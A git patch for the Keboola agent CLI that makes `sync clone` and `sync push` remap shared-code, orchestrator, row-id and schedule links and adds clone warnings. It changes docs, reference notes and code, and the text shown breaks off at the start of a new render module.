From 6af9c200f25ac046a1625eb3e25e049f76817267 Mon Sep 17 00:00:00 2001 From: soustruh Date: Wed, 30 Sep 2026 03:51:23 +0200 Subject: [PATCH 1/2] fix(sync): remap shared-code, orchestrator and schedule links, add clone warnings (CLI-24) --- CLAUDE.md | 2 +- docs/error-codes.md | 1 + plugins/kbagent/agents/keboola-expert.md | 2 +- .../kbagent/references/commands-reference.md | 4 +- .../skills/kbagent/references/gotchas.md | 19 + .../kbagent/references/sync-workflow.md | 9 + .../commands/_sync_clone_render.py | 76 ++ src/keboola_agent_cli/commands/context.py | 12 +- src/keboola_agent_cli/commands/sync.py | 64 +- src/keboola_agent_cli/errors.py | 1 + src/keboola_agent_cli/result_models.py | 15 + .../services/_sync_bindings.py | 632 ++++++++-- src/keboola_agent_cli/services/_sync_clone.py | 45 +- .../services/_sync_clone_warnings.py | 399 +++++++ .../services/_sync_models.py | 64 +- .../services/sync_service.py | 27 +- src/keboola_agent_cli/sync/clone.py | 6 +- tests/test_result_models.py | 15 + tests/test_sync_clone.py | 12 +- tests/test_sync_clone_links.py | 1052 +++++++++++++++++ 20 files changed, 2266 insertions(+), 191 deletions(-) create mode 100644 src/keboola_agent_cli/commands/_sync_clone_render.py create mode 100644 src/keboola_agent_cli/services/_sync_clone_warnings.py create mode 100644 tests/test_sync_clone_links.py diff --git a/CLAUDE.md b/CLAUDE.md index e16b9a1b1..238c2581b 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -981,7 +981,7 @@ kbagent sync push --project ALIAS [--all-projects] [--dry-run] [--force] [--allo # sync diff/push (0.89.0+, #649): local side read from exactly ONE tree (target branch subtree, else main/); entries tracked on another branch's tree are excluded from the changeset and reported under orphaned[] + summary.orphaned (reasons + reconcile hints); fix with sync pull. Adopt-by-id is branch-aware. # Ignored components (since 0.91.0, #689): keboola.mcp-server-tool joins keboola.sandboxes on ALWAYS_IGNORED_COMPONENTS (the MCP server's auto-created empty mcp-workspace- configs); the manifest field ignoredComponents (.keboola/manifest.json) is now LIVE and unions with the hardcoded set, honored by pull/diff/push. pull drops manifest entries + local dirs for a newly-ignored component, reported with action "ignored" (distinct from "removed" = deleted on remote); diff filters the local side too, so a stale dir for an ignored component can never classify as DELETED -- closes the delete-dir-then-push trap that used to destroy production keboola.mcp-server-tool configs. kbagent sync clone --source DIR --target ALIAS --target-dir DIR [--bucket-map FILE] [--variable-values FILE] [--instance-rename FILE] [--no-create-buckets] [--dry-run] [--branch ID] -# `sync clone` (0.63.0+) copies a reference synced tree into a fresh target project + parameterizes it: applies bucket_map / variable_values / instance_rename overrides (JSON/YAML files), then pushes so every config CREATEs fresh -- keboola.flow task configIds and transformation variable links are remapped reference->ULID by push Phase C/D. Idempotent: re-run with an existing --target-dir reports no_changes. Fails fast if the target already contains the reference's configs (clone needs a fresh target). Override files must be flat {id: scalar} mappings (0.89.0+): a nested mapping/list/null value is rejected with CONFIG_ERROR naming the key + actual type, instead of being silently stringified into a bogus ID. `--branch` is optional on a fresh clone. It defaults to the target's production branch, resolved from the API like `sync init`. Pass it only to target a dev branch of the target. Clone recreates the reference tree's storage buckets in the target from the `storage/buckets.json` pull export BY DEFAULT -- `--no-create-buckets` skips it. Idempotent: an existing bucket is skipped, a per-bucket failure is collected in `bucket_errors`, a linked (shared) bucket is linked to the same source as in the reference (listed in `linked_buckets`; the source's sharing settings decide, a refused link lands in `bucket_errors`). Only the buckets are created, never their tables or data (the export carries no table data). Version gate in gotchas.md. +# `sync clone` (0.63.0+) copies a reference synced tree into a fresh target project + parameterizes it: applies bucket_map / variable_values / instance_rename overrides (JSON/YAML files), then pushes so every config CREATEs fresh -- keboola.flow and keboola.orchestrator task configIds (and configRowIds), schedule targets, and transformation variable and shared-code links are remapped reference->ULID by push Phase C/D (`link_remaps` counts each kind; a link it cannot set is an `errors[]` entry, and a failed PUT is sent again by the next push). Schedules are never activated and data apps never deployed: `warnings[]` (also on --dry-run, human mode prints them) lists those, copied `KBC::` values the target cannot decrypt, and tasks that run a config not in the tree. Only the run that creates the configs reports them; a re-run returns `warnings: []`. Idempotent: re-run with an existing --target-dir reports no_changes. Fails fast if the target already contains the reference's configs (clone needs a fresh target). Override files must be flat {id: scalar} mappings (0.89.0+): a nested mapping/list/null value is rejected with CONFIG_ERROR naming the key + actual type, instead of being silently stringified into a bogus ID. `--branch` is optional on a fresh clone. It defaults to the target's production branch, resolved from the API like `sync init`. Pass it only to target a dev branch of the target. Clone recreates the reference tree's storage buckets in the target from the `storage/buckets.json` pull export BY DEFAULT -- `--no-create-buckets` skips it. Idempotent: an existing bucket is skipped, a per-bucket failure is collected in `bucket_errors`, a linked (shared) bucket is linked to the same source as in the reference (listed in `linked_buckets`; the source's sharing settings decide, a refused link lands in `bucket_errors`). Only the buckets are created, never their tables or data (the export carries no table data). Version gate in gotchas.md. kbagent sync branch-link --project ALIAS (--branch-id ID | --branch-name NAME) [--directory DIR] kbagent sync branch-unlink [--directory DIR] kbagent sync branch-status [--directory DIR] diff --git a/docs/error-codes.md b/docs/error-codes.md index 3238d55d4..6977cd7a9 100644 --- a/docs/error-codes.md +++ b/docs/error-codes.md @@ -131,6 +131,7 @@ of `ErrorCode` in `src/keboola_agent_cli/errors.py`. |---|---| | `PARENT_CONFIG_NOT_TRACKED` | Row operation references a parent config not in the manifest | | `VARIABLE_LINK_UNRESOLVED` | `sync push` could not resolve a transformation's variables link to a tracked config | +| `LINK_UNRESOLVED` | `sync push` could not re-point a shared-code row id or a task `configRowIds` entry to a row created in the same push; the id keeps its old value | | `SYNC_CONFLICT` | `sync pull --force` aborted: local and remote both changed since the last pull (`details.conflicts` lists them) | | `SYNC_LEGACY_BOUNDARY` | `sync push` refused one config: the working tree predates statement-boundary tracking, so pushing it would merge separate SQL statements into one. Run `sync pull` first | diff --git a/plugins/kbagent/agents/keboola-expert.md b/plugins/kbagent/agents/keboola-expert.md index 0c3f9ce58..8a986ec01 100644 --- a/plugins/kbagent/agents/keboola-expert.md +++ b/plugins/kbagent/agents/keboola-expert.md @@ -116,7 +116,7 @@ been retired, so its absence is NOT a promise (see §1 Rule 6). | Duplicate a configuration | `kbagent config clone --project P --component-id C --config-id K --name N [--target-project P2] [--secret PATH=VALUE]` (0.84.2+) -- same-project is a server-side copy (rows + `KBC::` values survive); cross-project needs a `--secret` per encrypted path, listed by `--dry-run` | -- | rebuilding the body from `config detail` (drops `runtime` / `storage` / `authorization` siblings SILENTLY -- a lost `runtime.parallelism` means the job runs single-threaded) | | Override the auto-derived output bucket | `kbagent config set-default-bucket --bucket in.c-name` (read-modify-write, preserves siblings; `--clear` removes it) | `kbagent config update --set 'storage.output.default_bucket=in.c-name'` | full-config replace with `--configuration` (wipes other storage keys) | | Cross-project migration | `kbagent sync pull` + edit files locally + `kbagent sync push --dry-run` | -- | per-resource REST loops | -| Provision a new project from a golden reference | `kbagent sync clone --source ./golden --target ALIAS --target-dir ./clone [--bucket-map F --variable-values F --instance-rename F]` -- copy + parameterize + push fresh; remaps flow task configIds and variable links; recreates the reference's storage buckets in the target by default (`--no-create-buckets` to skip; buckets only, not table data; a linked bucket is linked to the same source as in the reference and listed in `linked_buckets`); needs a FRESH target. `--branch` defaults to the target's production branch | -- | manual copy + id-surgery + `sync push` per resource | +| Provision a new project from a golden reference | `kbagent sync clone --source ./golden --target ALIAS --target-dir ./clone [--bucket-map F --variable-values F --instance-rename F]` -- copy + parameterize + push fresh; remaps flow/orchestrator task configIds, schedule targets, variable and shared-code links; read `warnings[]` of the first run, a re-run does not repeat them (vNEXT+: tasks running a config outside the tree, copied `KBC::` values, undeployed data apps, inactive schedules); recreates the reference's storage buckets in the target by default (`--no-create-buckets` to skip; buckets only, not table data; a linked bucket is linked to the same source as in the reference and listed in `linked_buckets`); needs a FRESH target. `--branch` defaults to the target's production branch | -- | manual copy + id-surgery + `sync push` per resource | | Retype table columns | fetch types via `workspace query`, write a transformation that produces a typed output table, then `kbagent storage swap-tables` to flip it into the original name. See [typify-table-workflow.md](../skills/kbagent/references/typify-table-workflow.md) | -- | `POST /v2/storage/buckets/.../tables-definition` (REST) plus manual config rewrites | | Create typed table with native types | `kbagent storage create-table --column pk:VARCHAR(40) --column amount:NUMBER(18,2) --not-null pk --default amount=0` | -- | re-creating via raw REST to `tables-definition` | | Add one column to an existing table | `kbagent storage add-column --project P --table-id in.c-foo.data --column status:VARCHAR(20) [--not-null] [--default active]` -- synchronous, same `name:TYPE(length)` grammar as `create-table` | -- | re-creating the whole table to add a field (loses data / PK / dependents) | diff --git a/plugins/kbagent/skills/kbagent/references/commands-reference.md b/plugins/kbagent/skills/kbagent/references/commands-reference.md index 33864977a..cb3b0d23c 100644 --- a/plugins/kbagent/skills/kbagent/references/commands-reference.md +++ b/plugins/kbagent/skills/kbagent/references/commands-reference.md @@ -360,8 +360,8 @@ Requires the project to be added with its **master ('owner') Storage API token** ## Sync (GitOps) - `sync init --project ALIAS [--directory DIR] [--git-branching] [--adopt-existing]` -- initialize sync working directory; `--adopt-existing` adopts a `.keboola/manifest.json` already written by the kbc Go CLI without overwriting (idempotent; validates `project_id` against the alias token) - `sync pull --project ALIAS [--all-projects] [--force] [--theirs] [--dry-run] [--with-samples] [--no-storage] [--no-jobs] [--job-limit N] [--branch ID]` -- download configs to local files. **Auto-inits:** if the target directory has no `.keboola/manifest.json`, pull runs `init` first, so a separate `sync init` is not needed for a first checkout of a project. For large projects (>100 configs), automatically fetches jobs per-config when the grouped API limit is insufficient. `--force` is conflict-aware (since 0.53.0): a locally-modified config whose remote is unchanged is **preserved** (pending delta stays pushable, never silently re-stamped); a true merge conflict (local AND remote both changed since last pull) **aborts** the pull (exit 1, `SYNC_CONFLICT`; `--json` lists `details.conflicts`); local-untouched + remote-changed takes remote. `--theirs` (since v0.72.0) is the supported "discard local, take production" reconcile path: overwrites locally-modified configs/rows, restores deleted/missing files, resolves conflicts by taking remote (no abort, no manifest surgery). Since v0.72.0 plain pull also re-materializes a tracked config whose local dir was deleted (manifest<->disk invariant), so delete-dir-then-pull refetches. Config-level `isDisabled` round-trips (since v0.72.0) as sparse `is_disabled: true` in `_config.yml` -- absent key = enabled. `--branch` (0.47.0+) per-invocation dev-branch override, beats every other branch source. Ignored components (since 0.91.0): `keboola.sandboxes` + `keboola.mcp-server-tool` are always excluded, unioned with the manifest's `ignoredComponents` list; a component newly ignored has its manifest entry dropped and local directory removed, reported with pull action `"ignored"` (distinct from `"removed"` = genuinely deleted on remote). Config-folder round-trip *(since 0.94.0)*: pull captures each config's UI folder (`KBC.configuration.folderName`, from the branch-only `search/component-configurations` endpoint) into the manifest, and reports `folder_lookup_failed` when that lookup fails, keeping the previously captured folder. -- `sync push --project ALIAS [--all-projects] [--dry-run] [--force] [--allow-plaintext-on-encrypt-failure] [--branch ID] [--no-name-drift-warnings]` -- push local changes (auto-encrypts secrets, fails if encryption fails). Fresh-CREATE writeback updates placeholder manifest entries in place (since 0.47.0) and propagates any `KBC.configuration.*` metadata via `set_config_metadata`. Fresh-CREATE variable binding (since 0.47.2): when a `keboola.variables` config + its values row are created alongside a transformation in the same push, the transformation's `variables_id` / `variables_values_id` placeholders are rebound to the assigned ULIDs and the row's `values` are hoisted even without a `_keboola` block, so `job run` succeeds with no post-push `config variables-set` step (unresolvable/ambiguous links surface a `variable_link` entry in `errors[]`, never a broken link). Never-fetched guard (since v0.72.0): a manifest entry with an empty `pull_hash` and no local files (pre-0.72 name-collision phantom) is **never** planned as a remote DELETE -- diff/push exclude it and report it under `never_fetched` with a warning (run `sync pull` to materialize); local deletion of a properly-pulled config deletes on `push --force`; since vNEXT (#792) a plain push deletes nothing and lists the deletion under `skipped_deletions` (also in `--dry-run`), and a config or row deleted on the remote since the last pull is `remote_deleted`, which push never re-creates. Adopted-by-id writeback (since v0.72.0): pushing an untracked file whose `_keboola.config_id` resolves on the branch also writes the manifest entry, so follow-up diffs are stable. `--branch` (0.47.0+) per-invocation override; when no `/` subtree exists on disk (since 0.47.2) the local default tree (`main/`) is promoted to the target branch (API writes still target the branch id); `--no-name-drift-warnings` (0.47.0+) drops the cosmetic warnings array. Branch-scoped since v0.89.0 (issue #649): push consumes the diff's changeset, so configs tracked on another branch's tree are never planned as creates -- they ride along on the result envelope under `orphaned` instead (see `sync diff`). **Since 0.91.0 (#686)** the manifest baseline `pull_config_hash` is stamped from the API response (or a read-back), not from the files on disk, so a pushed multi-statement SQL transformation -- or anything disabled in the UI whose local YAML lacks `is_disabled` -- no longer shows permanent phantom `REMOTE MODIFIED` drift; if the config cannot be read back after the write the baseline is left UNTOUCHED and a `warnings[]` entry says to run `sync pull` (never a disk-derived fallback). One legacy change is refused per-change with `SYNC_LEGACY_BOUNDARY`: a tree pulled before statement-boundary markers existed whose only difference from the remote is the lost boundaries (pushing it would collapse separate SQL statements into one) -- run `sync pull` for that project first. Ignored components (since 0.91.0) are filtered out on both sides of the diff push builds on, so a stale local directory for an ignored component (e.g. `keboola.mcp-server-tool`) is never classified as `DELETED` and can never be pushed as a remote deletion. -- `sync clone --source DIR --target ALIAS --target-dir DIR [--bucket-map FILE] [--variable-values FILE] [--instance-rename FILE] [--no-create-buckets] [--dry-run] [--branch ID]` -- clone a reference synced project into a **fresh** target project and parameterize it. Copies the reference tree at `--source` into `--target-dir`, applies declarative overrides from JSON/YAML files (`--bucket-map` `{old_bucket_id: new_bucket_id}` rewrites storage input/output table refs; `--variable-values` `{var_name: value}` overrides `keboola.variables` rows; `--instance-rename` `{old_path_prefix: new_path_prefix}` renames config dirs + manifest paths), re-points the manifest at the target project, and pushes. Because the reference's config ids do not exist in the fresh target, every config is CREATEd fresh and **keboola.flow task `configId`s + transformation variable links are remapped reference->ULID** by push Phase C/D (the push result carries `flow_task_remaps`). **Idempotent**: re-running with an existing `--target-dir` skips copy/overrides and just pushes, reporting `no_changes` / `created: 0`. Fails fast (`CONFIG_ERROR`) if the target already contains the reference's configs -- clone requires a fresh/empty target. `SyncService.clone_project(...)` returns a typed `CloneResult` for in-process SDK callers. Override files must be flat `{id: scalar}` mappings *(since v0.89.0)* -- a nested mapping, list, or null value is rejected with `CONFIG_ERROR` (exit 5) naming the key and its actual type. `--branch` is optional on a fresh clone *(since v0.93.1)*. It defaults to the target's production branch, resolved from the API the same way `sync init` does. Pass `--branch ` only to target a dev branch. The config folder (`KBC.configuration.folderName`) is recreated in the target *(since 0.94.0)* -- clone re-points its production configs onto the branch push resolves, so the create-path writeback carries the folder for a plain, `--branch`, and git-branching production clone. **Data-app runtime type (since 0.94.0)**: a `keboola.data-apps` config's type (`python-js` / `streamlit`) lives only on the Data Science `/apps` record, so `sync pull` records it in `_keboola.data_app_type` and clone sends it through `create_app`. A config with no recorded type is created as `python-js`, the default, with a `data_app_type_default` warning *(since vNEXT)*. Re-pull a tree pulled by an older version before cloning a Streamlit app, or it is created as `python-js`. **Storage buckets (since vNEXT)**: clone copies configs, not storage, so a cloned config's input/output mappings point at buckets a fresh target lacks. Clone reads the `storage/buckets.json` pull export and creates the missing buckets in the target **by default** (`--no-create-buckets` skips it) -- idempotent (an existing bucket is skipped, a per-bucket API failure is collected in `bucket_errors`), and the created id is `--bucket-map`-remapped so it matches the rewritten config refs. Each bucket is created on the backend the export recorded. A linked (shared) bucket is linked to the same source as in the reference, under the same id, and listed in `linked_buckets` with its source (an empty bucket in its place would stay empty). The source project's sharing settings decide whether the target may link it; a refused link lands in `bucket_errors`. A tree pulled by an older version does not record which buckets are linked, so clone creates no bucket from it and records one `bucket_errors` entry -- re-pull the reference, or pass `--no-create-buckets`. Only the buckets are created, never their tables or data (the export has no table data) -- populate tables by bucket sharing / `storage upload-table`, or by running the flows. +- `sync push --project ALIAS [--all-projects] [--dry-run] [--force] [--allow-plaintext-on-encrypt-failure] [--branch ID] [--no-name-drift-warnings]` -- push local changes (auto-encrypts secrets, fails if encryption fails). Fresh-CREATE writeback updates placeholder manifest entries in place (since 0.47.0) and propagates any `KBC.configuration.*` metadata via `set_config_metadata`. Fresh-CREATE variable binding (since 0.47.2): when a `keboola.variables` config + its values row are created alongside a transformation in the same push, the transformation's `variables_id` / `variables_values_id` placeholders are rebound to the assigned ULIDs and the row's `values` are hoisted even without a `_keboola` block, so `job run` succeeds with no post-push `config variables-set` step (unresolvable/ambiguous links add a `variable_link` entry in `errors[]`, never a broken link). Since vNEXT push also remaps shared-code links, flow and orchestrator task `configId`s / `configRowIds` and schedule targets to the configs created in the same push. A link it cannot set is an `errors[]` entry with `change_type` `shared_code_link`, `flow_task_link` or `schedule_target_link` (error code `LINK_UNRESOLVED` for a row id without a new row, `API_ERROR` for a failed PUT). After a failed PUT the local files already hold the new ids and the manifest hash stays stale, so the next `sync push` sends them; this also applies to `variable_link`. The result carries `link_remaps` (`flow_tasks`, `orchestrator_tasks`, `schedule_targets`, `shared_code`, `config_row_ids`); `flow_task_remaps` counts flow tasks only. Never-fetched guard (since v0.72.0): a manifest entry with an empty `pull_hash` and no local files (pre-0.72 name-collision phantom) is **never** planned as a remote DELETE -- diff/push exclude it and report it under `never_fetched` with a warning (run `sync pull` to materialize); local deletion of a properly-pulled config deletes on `push --force`; since vNEXT (#792) a plain push deletes nothing and lists the deletion under `skipped_deletions` (also in `--dry-run`), and a config or row deleted on the remote since the last pull is `remote_deleted`, which push never re-creates. Adopted-by-id writeback (since v0.72.0): pushing an untracked file whose `_keboola.config_id` resolves on the branch also writes the manifest entry, so follow-up diffs are stable. `--branch` (0.47.0+) per-invocation override; when no `/` subtree exists on disk (since 0.47.2) the local default tree (`main/`) is promoted to the target branch (API writes still target the branch id); `--no-name-drift-warnings` (0.47.0+) drops the cosmetic warnings array. Branch-scoped since v0.89.0 (issue #649): push consumes the diff's changeset, so configs tracked on another branch's tree are never planned as creates -- they ride along on the result envelope under `orphaned` instead (see `sync diff`). **Since 0.91.0 (#686)** the manifest baseline `pull_config_hash` is stamped from the API response (or a read-back), not from the files on disk, so a pushed multi-statement SQL transformation -- or anything disabled in the UI whose local YAML lacks `is_disabled` -- no longer shows permanent phantom `REMOTE MODIFIED` drift; if the config cannot be read back after the write the baseline is left UNTOUCHED and a `warnings[]` entry says to run `sync pull` (never a disk-derived fallback). One legacy change is refused per-change with `SYNC_LEGACY_BOUNDARY`: a tree pulled before statement-boundary markers existed whose only difference from the remote is the lost boundaries (pushing it would collapse separate SQL statements into one) -- run `sync pull` for that project first. Ignored components (since 0.91.0) are filtered out on both sides of the diff push builds on, so a stale local directory for an ignored component (e.g. `keboola.mcp-server-tool`) is never classified as `DELETED` and can never be pushed as a remote deletion. +- `sync clone --source DIR --target ALIAS --target-dir DIR [--bucket-map FILE] [--variable-values FILE] [--instance-rename FILE] [--no-create-buckets] [--dry-run] [--branch ID]` -- clone a reference synced project into a **fresh** target project and parameterize it. Copies the reference tree at `--source` into `--target-dir`, applies declarative overrides from JSON/YAML files (`--bucket-map` `{old_bucket_id: new_bucket_id}` rewrites storage input/output table refs; `--variable-values` `{var_name: value}` overrides `keboola.variables` rows; `--instance-rename` `{old_path_prefix: new_path_prefix}` renames config dirs + manifest paths), re-points the manifest at the target project, and pushes. Because the reference's config ids do not exist in the fresh target, every config is CREATEd fresh and **keboola.flow task `configId`s + transformation variable links are remapped reference->ULID** by push Phase C/D (the push result carries `flow_task_remaps`). Since vNEXT push also remaps shared-code links (`shared_code_id`, `shared_code_row_ids`, `{{}}` script placeholders), legacy `keboola.orchestrator` task `configId`s, task `configRowIds` and a schedule's `target.configurationId`; the clone result carries `link_remaps` per kind (see `sync push`). **`warnings[]` (since vNEXT)**: the clone result (also `--dry-run`; human mode prints them) lists `missing_task_target` (a flow or orchestrator task runs a config that is not in the tree), `encrypted_values_copied` (the `KBC::` paths the target cannot decrypt, as `_config.yml` paths: `secret_keys` get a plaintext + `sync push`, `unencryptable_keys` need `kbagent encrypt values`, `oauth_keys` a new authorization), `data_app_not_deployed` (run `data-app deploy`) and `schedule_not_active` (clone never activates a schedule; `flow schedule` does, and the hint is left out when several schedules run one flow), plus the push warnings. Only the run that creates the configs reports them: a re-run returns `warnings: []`, so keep them from the first run. **Idempotent**: re-running with an existing `--target-dir` skips copy/overrides and just pushes, reporting `no_changes` / `created: 0`. Fails fast (`CONFIG_ERROR`) if the target already contains the reference's configs -- clone requires a fresh/empty target. `SyncService.clone_project(...)` returns a typed `CloneResult` for in-process SDK callers. Override files must be flat `{id: scalar}` mappings *(since v0.89.0)* -- a nested mapping, list, or null value is rejected with `CONFIG_ERROR` (exit 5) naming the key and its actual type. `--branch` is optional on a fresh clone *(since v0.93.1)*. It defaults to the target's production branch, resolved from the API the same way `sync init` does. Pass `--branch ` only to target a dev branch. The config folder (`KBC.configuration.folderName`) is recreated in the target *(since 0.94.0)* -- clone re-points its production configs onto the branch push resolves, so the create-path writeback carries the folder for a plain, `--branch`, and git-branching production clone. **Data-app runtime type (since 0.94.0)**: a `keboola.data-apps` config's type (`python-js` / `streamlit`) lives only on the Data Science `/apps` record, so `sync pull` records it in `_keboola.data_app_type` and clone sends it through `create_app`. A config with no recorded type is created as `python-js`, the default, with a `data_app_type_default` warning *(since vNEXT)*. Re-pull a tree pulled by an older version before cloning a Streamlit app, or it is created as `python-js`. **Storage buckets (since vNEXT)**: clone copies configs, not storage, so a cloned config's input/output mappings point at buckets a fresh target lacks. Clone reads the `storage/buckets.json` pull export and creates the missing buckets in the target **by default** (`--no-create-buckets` skips it) -- idempotent (an existing bucket is skipped, a per-bucket API failure is collected in `bucket_errors`), and the created id is `--bucket-map`-remapped so it matches the rewritten config refs. Each bucket is created on the backend the export recorded. A linked (shared) bucket is linked to the same source as in the reference, under the same id, and listed in `linked_buckets` with its source (an empty bucket in its place would stay empty). The source project's sharing settings decide whether the target may link it; a refused link lands in `bucket_errors`. A tree pulled by an older version does not record which buckets are linked, so clone creates no bucket from it and records one `bucket_errors` entry -- re-pull the reference, or pass `--no-create-buckets`. Only the buckets are created, never their tables or data (the export has no table data) -- populate tables by bucket sharing / `storage upload-table`, or by running the flows. - `sync diff --project ALIAS [--all-projects] [--branch ID]` -- 3-way diff (local vs base vs remote), detects conflicts. `--branch` (0.47.0+) per-invocation dev-branch override. Branch-scoped since v0.89.0 (issue #649): the local side is read from exactly ONE tree (the target branch's subtree, or `main/` when the target has none). Manifest entries belonging to another branch's tree -- what `sync pull --branch ` leaves behind when it re-targets the manifest -- are excluded from the changeset and reported under `orphaned` (`summary.orphaned` + details with `component_id`, `config_id`, `path`, `branch_id`, `branch_path`, `exists_on_target`, `reason`, `hint`); human mode previews the first 10. An orphaned FILE whose `_keboola.config_id` still resolves on the target is adopted (diffed as `unchanged`/`modified`), never re-created; same-tree id claims keep the #482/#497 fork-by-copy CREATE. Fix a non-zero `summary.orphaned` with `sync pull`. **Since 0.91.0 (#686)** a manifest entry without `metadata.config_hash_version` (written by a pre-0.91.0 kbagent) is compared leniently: a stored hash equal to the pre-0.91.0 hash of the SAME remote config counts as in sync, so the phantom `codes changed` entries disappear immediately; every other field is still pinned by that hash, so real remote drift is unaffected. One `sync pull` per project stamps the version and ends the leniency. Ignored components (since 0.91.0) -- `keboola.sandboxes`, `keboola.mcp-server-tool`, and anything listed in the manifest's `ignoredComponents` -- are excluded from BOTH sides of the comparison, so a stale local directory for one of them never shows up as `DELETED`. Since vNEXT (#792) a config or row the manifest fetched from the target branch and that is missing on the remote is `remote_deleted` (human: `- REMOTE DELETED`, `summary.remote_deleted`): run `sync pull`, push never re-creates it. `DELETED` changes are applied only by `sync push --force`. - `sync status [--directory DIR]` -- show locally modified/added/deleted configs. Also surfaces `plaintext_secret_warnings` (since 0.55.0): in-sync configs/rows whose `#`-secrets are still plaintext on the remote (a leftover from pre-0.54.0 writes; #378). Pending (un-pushed) edits are not flagged. Fix = re-push on >=0.54.0 + rotate (version history keeps the plaintext). - `sync branch-link --project ALIAS [--branch-id ID] [--branch-name NAME]` -- link git branch to Keboola dev branch diff --git a/plugins/kbagent/skills/kbagent/references/gotchas.md b/plugins/kbagent/skills/kbagent/references/gotchas.md index 5c8b865a8..a626b87b9 100644 --- a/plugins/kbagent/skills/kbagent/references/gotchas.md +++ b/plugins/kbagent/skills/kbagent/references/gotchas.md @@ -1058,6 +1058,25 @@ A linked (shared) bucket is **linked** in the target to the same source as in th Only the buckets are created, never their tables or their data -- the pull export carries table metadata (columns / primary key) but no table data, only truncated samples. Move the actual data by bucket sharing, `storage upload-table`, or by running the flows that populate the output tables. The old Go CLI `kbc` did not materialize storage into the tree at all, so this is strictly more than parity. +## `sync clone` re-points shared code, orchestrator tasks and schedules, and lists what the target still needs + +*(since vNEXT)* + +Before vNEXT, `sync push` set only two kinds of links to the config IDs it created in the same push: `keboola.flow` job-task `configId`s and transformation `variables_id` / `variables_values_id`. All other links kept the reference IDs, and `sync clone` still reported `status: cloned` with `errors: []`: a transformation's `shared_code_id`, `shared_code_row_ids` and `{{}}` script placeholders, a legacy `keboola.orchestrator` task's `configId`, a task's `configRowIds`, and a `keboola.scheduler` config's `target.configurationId`. + +Now push sets these to the new IDs too, for a clone and for a plain `sync push` of a fresh tree. It rewrites the placeholders in the remote scripts and in the local `transform.sql` / `transform.py`. A row ID is looked up under its own new parent config, so two shared-code configs with the same row ID do not swap rows. Push never registers a schedule with the Scheduler service, so a cloned project starts no jobs by itself. + +A link push cannot set is an `errors[]` entry, never a silent skip: `change_type` `shared_code_link`, `flow_task_link` or `schedule_target_link` (next to the existing `variable_link`). A row ID with no new row (for example its create failed) has error code `LINK_UNRESOLVED` and keeps the old ID. When the PUT of a link fails, the local files already hold the new IDs and the manifest hash is left stale, so the next `sync push` (or `sync clone` re-run) sees a modified config and sends them. The push and clone results carry `link_remaps` with one count per kind (`flow_tasks`, `orchestrator_tasks`, `schedule_targets`, `shared_code`, `config_row_ids`). `flow_task_remaps` still counts flow tasks only. + +`sync clone` (also with `--dry-run`) adds these entries to `warnings[]` and prints them in human mode. Each entry has `change_type`, `component_id`, `config_id`, `path` and `message`: + +- `missing_task_target`: a flow or orchestrator task runs a config that is not in the tree, for example an ignored `keboola.sandboxes` config. The target has no such config. Extra fields: `task_id`, `task_name`, `target_component_id`, `target_config_id`. +- `encrypted_values_copied`: one entry per config. The paths are in the `_config.yml` shape (`authorization` is under `_configuration_extra`, a row's paths start with the row path), never the values. `secret_keys` are under a `#` key: put the plaintext into the clone's `_config.yml` and run `sync push`, which encrypts it for the target (`config clone --target-project` handles this for a single config with `--secret PATH=VALUE`). `unencryptable_keys` are under a plain key, which push does not encrypt: encrypt the value with `kbagent encrypt values` and set the result. `oauth_keys` are OAuth credentials: authorize the config again in the target. Clone reads these values before it pushes, so a plaintext `#` value in the reference is not reported. +- `data_app_not_deployed`: sync creates a data app but does not deploy it. `app_id` is the new app; run `kbagent data-app deploy --project T --app-id ID` (with `--branch` when the clone used it). +- `schedule_not_active`: `active: false`. `kbagent flow schedule --project T --flow-id F --cron '...'` updates that schedule and registers it; the hint adds `--disabled` for a disabled schedule and `--branch` when the clone used it. `flow schedule` updates only the first schedule of a flow, so when several cloned schedules run one flow the message says to activate them in the Keboola UI instead. + +The clone `warnings[]` also carries the push warnings, which before were only in `push.warnings`. Only the run that creates the configs reports the warnings: a re-run that creates nothing returns `warnings: []`, so keep them from the first run. After a `--dry-run` the tree still has the reference IDs, so those messages give no command with an ID. + ## `semantic-layer search-context` + `get-context` cover the upstream `search_semantic_context` / `get_semantic_context` parity `kbagent semantic-layer search-context --project P [--pattern G ...] [--type T] [--limit N]` diff --git a/plugins/kbagent/skills/kbagent/references/sync-workflow.md b/plugins/kbagent/skills/kbagent/references/sync-workflow.md index 4c606b1b1..6f4d3d014 100644 --- a/plugins/kbagent/skills/kbagent/references/sync-workflow.md +++ b/plugins/kbagent/skills/kbagent/references/sync-workflow.md @@ -610,6 +610,15 @@ id, the **Phase-C** transformation variable links **and the Phase-D `keboola.flow` task `configId`s** remap reference→ULID automatically — no manual "remap orchestrator task" pass. The push result carries `flow_task_remaps`. +Since vNEXT push also remaps a transformation's shared code (`shared_code_id`, `shared_code_row_ids` and the `{{}}` script placeholders), legacy `keboola.orchestrator` task `configId`s, task `configRowIds`, and a schedule's `target.configurationId`. The result carries `link_remaps` with one count per kind. A link push cannot set is an `errors[]` entry (`shared_code_link`, `flow_task_link`, `schedule_target_link`). After a failed PUT the next `sync push` or clone re-run sends the link again. + +**Check `warnings[]` after a clone (since vNEXT).** Some configs need an action in the target. The clone result lists each one in `warnings[]` next to the push warnings, also for `--dry-run`, and human mode prints them. Only the run that creates the configs reports them, so keep them from the first run: + +- `missing_task_target`: a flow or orchestrator task runs a config that is not in the tree, for example an ignored `keboola.sandboxes` config. +- `encrypted_values_copied`: `KBC::` values that only the reference project can decrypt, as `_config.yml` paths. For `secret_keys` put the plaintext into the clone's `_config.yml` and run `sync push`. `unencryptable_keys` need `kbagent encrypt values`, `oauth_keys` a new authorization. +- `data_app_not_deployed`: run `kbagent data-app deploy`. +- `schedule_not_active`: clone never activates a schedule, so the new project starts no jobs by itself. `kbagent flow schedule --flow-id ...` activates it; with several schedules on one flow, use the Keboola UI. + **Idempotent:** re-running with an existing `--target-dir` skips the copy + overrides and just pushes, so a completed clone reports `no_changes` / `created: 0`. Re-running is safe. diff --git a/src/keboola_agent_cli/commands/_sync_clone_render.py b/src/keboola_agent_cli/commands/_sync_clone_render.py new file mode 100644 index 000000000..38e93df98 --- /dev/null +++ b/src/keboola_agent_cli/commands/_sync_clone_render.py @@ -0,0 +1,76 @@ +"""Human output for ``sync clone``. + +Split out of ``commands/sync.py``, which is at its size ceiling. The clone +result carries the push outcome, the bucket outcome, and ``warnings[]``: what +the target project still needs after the clone (CLI-24). +""" + +from __future__ import annotations + +from typing import Any + +from rich.markup import escape + + +def 